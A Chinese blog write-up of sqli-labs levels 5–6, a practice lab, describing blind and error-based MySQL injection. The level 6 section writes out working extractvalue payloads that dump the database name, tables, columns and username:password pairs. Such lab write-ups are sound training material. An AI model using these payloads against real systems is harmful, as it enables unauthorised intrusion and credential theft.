sql-labs通关记录(5-6)

less-5
?id=1
在这里插入图片描述结果不返回数据库中的数据,加反引号。
在这里插入图片描述报错,再加个单引号。
在这里插入图片描述说明存在sql盲注。(进一步验证,属于字符型注入)

结合bp爆破数据库的长度和数据库名。
在这里插入图片描述在这里插入图片描述数据库长度为8,接着爆库名。
在这里插入图片描述在这里插入图片描述在这里插入图片描述库名为secuirty.

爆表
第一张表
在这里插入图片描述在这里插入图片描述emails,将limit 0,1换成limit 1,1 爆破第二张表。
在这里插入图片描述依次得到所有的表:emails,referers,usgents,users

爆users表的字段。
在这里插入图片描述依次跑出所有字段,找到username,password字段。

爆username数据,同理依次找出响应密码。
在这里插入图片描述在这里插入图片描述密码
在这里插入图片描述在这里插入图片描述

less-6
在这里插入图片描述在这里插入图片描述less-6与less-5一样,都是盲注,不过less-6使用的是双引号,将less-5中payload中的单引号改成双引号即可。

这里我尝试一下另一种方法,报错注入

爆库

?id=1"and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

在这里插入图片描述爆表

?id=1"and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e)) --+

在这里插入图片描述

爆字段

?id=1"and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e)) --+

在这里插入图片描述因为报错最多返回32位,所以要使用limit来输出。

?id=1"and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name="users" limit 5,1),0x7e)) --+

在这里插入图片描述找到username和password字段。

爆数据

?id=1"and extractvalue(1,concat(0x7e,substr((select group_concat(username,":",password) from users) ,0,30),0x7e)) --+

在这里插入图片描述更换这里的数字。

依次将所有数据跑出来。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值